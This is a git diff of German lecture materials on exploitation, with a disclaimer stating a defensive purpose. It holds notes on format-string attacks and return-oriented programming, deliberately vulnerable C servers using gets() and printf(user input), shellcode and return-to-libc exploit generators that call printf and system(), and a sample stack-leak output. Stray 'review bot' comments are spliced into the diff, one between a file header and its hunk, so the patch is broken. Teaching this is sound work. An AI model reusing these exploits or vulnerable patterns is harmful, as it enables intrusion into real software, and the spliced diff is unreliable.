diff --git a/20170707/test.txt b/20170707/test.txt
new file mode 100644
index 0000000000000000000000000000000000000000..e69de29bb2d1d6434b8b29ae775ad8c2e48c5391
diff --git a/20170714/bs-20170714.txt b/20170714/bs-20170714.txt
new file mode 100644
index 0000000000000000000000000000000000000000..a64cf82076c9885a9bdd726855e52f4871f36a02
--- /dev/null
+++ b/20170714/bs-20170714.txt
@@ -0,0 +1,58 @@
+Exploits, 14.07.2017
+~~~~~~~~~~~~~~~~~~~~
+Vorab:
+
+ Dies ist keine Einladung, anderer Leute Systeme anzugreifen.
+ Derartige Handlungen sind Straftaten.
+
+ Ich erzähle Ihnen dies, damit Sie wissen,
+ wie Sie sich gegen derartige Angriffe verteidigen können.
+
+ Um es gleich vorwegzunehmen:
+ Gewöhnen Sie sich von vorneherein an,
+ sauber und ordentlich zu programmieren.
+
+Anleitungen für Exploits:
+http://www.computersecuritystudent.com/SECURITY_TOOLS/BUFFER_OVERFLOW/WINDOWS_APPS/lesson1/index.html
+http://www.thesprawl.org/research/exploit-exercises-protostar-stack/
+
+Literatur:
+Jon Erickson: Hacking: The Art of Exploitation.
+No Starch Press, 2003. ISBN: 1-59327-007-0
+
+Anleitung für den GNU-Debugger (gdb):
+http://beej.us/guide/bggdb/
+
+Formatstring-Angriff:
+
+ printf (user_string) für Exploit nutzen: %016llx
+ Server, der Passwort auf dem Stack speichert --> server-0.c
+
+ $ ./server-0
+ Your name, please: %016llx %016llx %016llx %016llx %016llx %016llx %016llx %016llx
+ Hello, 00000000004007c7 00007fdb2ced2df0 00000000004007c7 00007fdb2d0f3007
+ 20786c6c36313025 6373316870216948 00007fdb2cbd0068 0000007265746570!
+ ~~~~~~~~~~~~~~~~ ~~~~
+ Your password, please:
+
+SQL Injection: http://xkcd.com/327/
+
+Noch blöder: Java-Browser-Applet enthält Passwörter im Klartext:
+http://heise.de/-2812713
+
+Buffer Overflow für Exploit nutzen: server-[123].c, exploit-*
+
+Warum Absturz? Rücksprungadresse wird überschrieben. Blick auf den Stack.
+Funktionsaufruf: Register setzen, Funktion anspringen.
+Exploit: Rücksprungadresse gezielt überschreiben.
+Früher möglich: Programm in den Stack schreiben, dorthin springen.
+Heute: Nicht-ausführbarer Stack, Address Space Layout Randomization (ASLR)
+Return Oriented Programming erforderlich
+genauer: return-to-libc; noch genauer: return-to-plt
+Gezielt Winz-Funktionen anspringen, um Register zu setzen,
+danach Programm- und Bibliotheksfunktionen anspringen.
+
+Exploits: aktuelle Sicherheitslücke, 28.12.2016, 13:46:05
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Lücke in PHPMailer erlaubt die Ausführung fremden Codes
+https://heise.de/-3582072
diff --git a/20170714/exploit-1.c b/20170714/exploit-1.c
new file mode 100644
index 0000000000000000000000000000000000000000..8152a6be038087a2757dfb9f520118124b1c52a0
--- /dev/null
+++ b/20170714/exploit-1.c
@@ -0,0 +1,14 @@
+#include <unistd.h>
+
+int main (int argc, char **argv)
+{
+ for (int i = 2; i < 50; i++)
+ write (1, "\x90", 1); // nop
+ write (1, "\x48\x83\xec\x60", 4); // sub $0x60,%rsp
+ write (1, "\x48\x89\xe7", 3); // mov %rsp,%rdi
+ write (1, "\xb8\x00\x00\x00\x00", 5); // mov $0x0,%eax
+ write (1, "\xe8\x26\xfe\xff\xff", 5); // callq 0x4003e0 <printf@plt>
+ write (1, "\xeb\xfe", 2); // while (1);
+ write (1, "\n", 1);
+ return 0;
+}
diff --git a/20170714/exploit-1.txt b/20170714/exploit-1.txt
new file mode 100644
index 0000000000000000000000000000000000000000..085a561a1367caf24c2cc3c602309ed3281e3162
Binary files /dev/null and b/20170714/exploit-1.txt differ
diff --git a/20170714/exploit-1a.c b/20170714/exploit-1a.c
new file mode 100644
index 0000000000000000000000000000000000000000..7ecbb0945c486c045c4677f9a29a97fc998f79f8
--- /dev/null
+++ b/20170714/exploit-1a.c
@@ -0,0 +1,17 @@
+#include <unistd.h>
+#include <stdint.h>
+
+int main (int argc, char **argv)
+{
+ uint64_t return_address = 0x7fffffffdfc0;
+ for (int i = 2; i < 42; i++)
+ write (1, "\x90", 1); // nop
+ write (1, &return_address, 8);
+ write (1, "\x48\x83\xec\x60", 4); // sub $0x60,%rsp
+ write (1, "\x48\x89\xe7", 3); // mov %rsp,%rdi
+ write (1, "\xb8\x00\x00\x00\x00", 5); // mov $0x0,%eax
+ write (1, "\xe8\x26\xfe\xff\xff", 5); // callq 0x4003e0 <printf@plt>
+ write (1, "\xeb\xfe", 2); // while (1);
+ write (1, "\n", 1);
+ return 0;
+}
diff --git a/20170714/exploit-1a.txt b/20170714/exploit-1a.txt
new file mode 100644
index 0000000000000000000000000000000000000000..1a76575333d6cd9d5d6e632f860f435a71a67bf8
Binary files /dev/null and b/20170714/exploit-1a.txt differ
diff --git a/20170714/exploit-2.c b/20170714/exploit-2.c
new file mode 100644
index 0000000000000000000000000000000000000000..d1ac24e9cd658ca1bed90902129ecd363a6c7dca
--- /dev/null
+++ b/20170714/exploit-2.c
@@ -0,0 +1,26 @@
+#include <stdlib.h>
+#include <stdint.h>
+#include <unistd.h>
+
+#define OVERFLOW 40
+
+int main (int argc, char **argv)
+{
+ uint64_t mov_rsp_rdi = 0x555555554791;
+ uint64_t add_offset_to_edi = 0x555555554798;
+ uint64_t dummy = 0;
+ uint64_t printf_address = 0x7ffff7a8a160;
+ uint64_t exit_address = 0x7ffff7a70950;
+ uint8_t overflow[OVERFLOW] = "loser";
+ uint8_t payload[] = "I 0WN U!!1! "
+ " ";
+ write (1, overflow, sizeof (overflow));
+ write (1, &mov_rsp_rdi, 8);
+ write (1, &add_offset_to_edi, 8);
+ write (1, &printf_address, 8);
+ write (1, &exit_address, 8);
+ write (1, &dummy, 8);
+ write (1, payload, sizeof (payload));
+ write (1, "\n", 1);
+ return 0;
+}
diff --git a/20170714/exploit-2.txt b/20170714/exploit-2.txt
new file mode 100644
index 0000000000000000000000000000000000000000..96b05454ae0f416708a6a0b9b10b0cf797f22b6a
Binary files /dev/null and b/20170714/exploit-2.txt differ
diff --git a/20170714/exploit-3.c b/20170714/exploit-3.c
new file mode 100644
index 0000000000000000000000000000000000000000..78df8b1c021feccf689641ba65b9555a7c6615dd
--- /dev/null
+++ b/20170714/exploit-3.c
@@ -0,0 +1,25 @@
+#include <stdlib.h>
+#include <stdint.h>
+#include <unistd.h>
+
+#define OVERFLOW 40
+
+int main (int argc, char **argv)
+{
+ uint64_t mov_rsp_rdi = 0x555555554791;
+ uint64_t add_offset_to_edi = 0x555555554798;
+ uint64_t dummy = 0;
+ uint64_t system_address = 0x7ffff7a7a450;
+ uint64_t exit_address = 0x7ffff7a70950;
+ uint8_t overflow[OVERFLOW] = "loser";
+ uint8_t payload[] = "gimp ../common/os-layers.xcf.gz";
+ write (1, overflow, sizeof (overflow));
+ write (1, &mov_rsp_rdi, 8);
+ write (1, &add_offset_to_edi, 8);
+ write (1, &system_address, 8);
+ write (1, &exit_address, 8);
+ write (1, &dummy, 8);
+ write (1, payload, sizeof (payload));
+ write (1, "\n", 1);
+ return 0;
+}
diff --git a/20170714/exploit-3.txt b/20170714/exploit-3.txt
new file mode 100644
index 0000000000000000000000000000000000000000..b08f8923fab1ad54ff81da72bd44cffd3d045d94
Binary files /dev/null and b/20170714/exploit-3.txt differ
diff --git a/20170714/peter.txt b/20170714/peter.txt
new file mode 100644
index 0000000000000000000000000000000000000000..9e4e7a981b8cd4928e8f14ea1e252e4b4c71b8b8
--- /dev/null
+++ b/20170714/peter.txt
@@ -0,0 +1 @@
+peter
diff --git a/20170714/photo-20161219-162640.jpg b/20170714/photo-20161219-162640.jpg
new file mode 100644
index 0000000000000000000000000000000000000000..5387108f6aa5f77251cf6c981d71e6b77dbb9468
Binary files /dev/null and b/20170714/photo-20161219-162640.jpg differ
diff --git a/20170714/photo-20170102-130102.jpg b/20170714/photo-20170102-130102.jpg
new file mode 100644
index 0000000000000000000000000000000000000000..92c6ab059d2e58e7d3c43f5ba7c6377be3d38645
Binary files /dev/null and b/20170714/photo-20170102-130102.jpg differ
diff --git a/20170714/server-0.c b/20170714/server-0.c
new file mode 100644
index 0000000000000000000000000000000000000000..96f8b4df4c5a467aa5d2ec424434a6a33a6f6127
--- /dev/null
+++ b/20170714/server-0.c
@@ -0,0 +1,24 @@
+#include <stdio.h>
+#include <string.h>
+#include <unistd.h>
+
+int main (void)
+{
+ char name_buffer[100];
+ char *pass_buffer;
+ char username[] = "peter";
+ char password[] = "Hi!ph1sch";
+
+ printf ("Your name, please: ");
+ gets (name_buffer);
+ printf ("Hello, ");
+ printf (name_buffer);
+ printf ("!\n");
+
+ pass_buffer = getpass ("Your password, please: ");
+ if (strcmp (name_buffer, username) == 0 && strcmp (pass_buffer, password) == 0)
+ printf ("You have access.\n");
+ else
+ printf ("Login incorrect.\n");
+ return 0;
+}
diff --git a/20170714/server-1.c b/20170714/server-1.c
new file mode 100644
index 0000000000000000000000000000000000000000..68f9eb57f5e277413a0206ed9af175033e9cda9d
--- /dev/null
+++ b/20170714/server-1.c
@@ -0,0 +1,10 @@
+#include <stdio.h>
+
+int main (void)
+{
+ char buffer[20];
+ printf ("Your name, please: ");
+ gets (buffer);
+ printf ("Hello, %s!\n", buffer);
+ return 0;
+}
diff --git a/20170714/server-2.c b/20170714/server-2.c
new file mode 100644
index 0000000000000000000000000000000000000000..4aac725ae5c30412f0952a770d1c9d9f6c1f6895
--- /dev/null
+++ b/20170714/server-2.c
@@ -0,0 +1,33 @@
+#include <stdio.h>
+#include <stdlib.h>
+
+void stuff (void)
+{
+ asm ("mov $0, %eax");
+ asm ("add $0x28, %rsp");
+ asm ("ret");
+ asm ("nop");
+ asm ("nop");
+ asm ("nop");
+ asm ("mov %rsp, %rdi");
+ asm ("ret");
+ asm ("nop");
+ asm ("nop");
+ asm ("nop");
+ asm ("add $0x20, %rdi");
+ asm ("ret");
+ asm ("nop");
+ asm ("nop");
+ asm ("nop");
+ system ("clear");
+ exit (0);
+}
+
+int main (void)
+{
+ char buffer[20];
+ printf ("Your name, please: ");
+ gets (buffer);
+ printf ("Hello, %s!\n", buffer);
+ return 0;
+}
diff --git a/20170714/server-3.c b/20170714/server-3.c
new file mode 100644
index 0000000000000000000000000000000000000000..11c3a7ff2bf4e1f27accebd7d9caddf6d90dfb66
--- /dev/null
+++ b/20170714/server-3.c
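Review bot: `gets (name_buffer)` reads with no bound and `printf (name_buffer)` hands the user's input to printf as the format string, so the name prompt in server-0.c can both overrun the 100-byte buffer and disclose stack contents (the lecture notes show exactly that output); `gets` was also removed from the language in C11. If this file is meant to stay vulnerable for the lecture, say so at the top with a comment such as `/* deliberately vulnerable teaching server: gets() and printf(name_buffer) -- do not reuse */`; the hardened form is `fgets (name_buffer, sizeof name_buffer, stdin);` and `printf ("%s", name_buffer);`. server-1.c and server-2.c on this line use `gets (buffer)` on a 20-byte buffer the same way, and test-c.c further down repeats the non-literal format string with `printf (msg)`. The hard-coded `username`/`password` pair compared with `strcmp` is fine for a demo but deserves a one-line comment that the credentials exist only for the exercise.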
@@ -0,0 +1,33 @@
+#include <stdio.h>
+#include <stdlib.h>
+
+void stuff (void)
+{
+ asm ("mov $0, %eax");
+ asm ("add $0x28, %rsp");
+ asm ("ret");
+ asm ("nop");
+ asm ("nop");
+ asm ("nop");
+ asm ("mov %rsp, %rdi");
+ asm ("ret");
+ asm ("nop");
+ asm ("nop");
+ asm ("nop");
+ asm ("add $0x20, %rdi");
+ asm ("ret");
+ asm ("nop");
+ asm ("nop");
+ asm ("nop");
+ system ("clear");
+ exit (0);
+}
+
+int main (void)
+{
+ char buffer[20];
+ printf ("Your name, please: ");
+ fgets (buffer, 20, stdin);
+ printf ("Hello, %s!\n", buffer);
+ return 0;
+}
diff --git a/20170714/test-asm.c b/20170714/test-asm.c
new file mode 100644
index 0000000000000000000000000000000000000000..33197ee6c2ec26004a3768605816ad76a4da275a
--- /dev/null
+++ b/20170714/test-asm.c
@@ -0,0 +1,11 @@
+int main (void)
+{
+ char msg[] = "I 0WN U!!1! "
+ " ";
+ asm ("sub $96, %rsp");
+ asm ("mov %rsp, %rdi");
+ asm ("mov $0, %eax");
+ asm ("call printf");
+ asm ("add $96, %rsp");
+ return 0;
+}
diff --git a/20170714/test-c.c b/20170714/test-c.c
new file mode 100644
index 0000000000000000000000000000000000000000..6c28d494dd66ead8c843b9cc7bf04dd4562774f1
--- /dev/null
+++ b/20170714/test-c.c
@@ -0,0 +1,9 @@
+#include <stdio.h>
+
+int main (void)
+{
+ char msg[] = "I 0WN U!!1! "
+ " ";
+ printf (msg);
+ return 0;
+}
diff --git a/common/os-layers.xcf.gz b/common/os-layers.xcf.gz
new file mode 100644
index 0000000000000000000000000000000000000000..33b9c21bb687417dc59909158c89455d386e2d8e
Binary files /dev/null and b/common/os-layers.xcf.gz differ
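Review bot: `fgets (buffer, 20, stdin)` in server-3.c's `main` hard-codes the buffer size instead of using `sizeof buffer`, ignores a NULL return on EOF, and leaves the trailing newline in `buffer`, so the greeting prints the `!` on its own line. A tighter version is `if (fgets (buffer, sizeof buffer, stdin) == NULL) return 1;` followed by `buffer[strcspn (buffer, "\n")] = '\0';` (which needs `<string.h>`). The never-called `stuff` function is carried over verbatim from server-2.c, so the "fixed" binary still contains a `system ("clear")` / `exit (0)` sequence it never needs; if server-3.c is meant to show the repaired program, dropping `stuff` or marking it `/* lecture-only: unreachable from main */` would make that intent explicit.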
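Review bot: in test-asm.c `msg` is declared but never referenced, and the basic `asm` statements move `%rsp`, overwrite `%rdi`/`%eax` and call `printf` with no clobber list, so the compiler assumes no register or memory changed and whatever `%rsp` points at after `sub $96, %rsp` depends on the compiler's frame layout rather than on `msg`. If the intent is to print `msg`, the portable form is `printf ("%s", msg);`; if the point is to show the raw calling sequence, the statements should at least be extended asm with explicit clobbers, and the file should include `<stdio.h>` so `printf` is declared. The same non-literal format string appears as `printf (msg)` in test-c.c on this line.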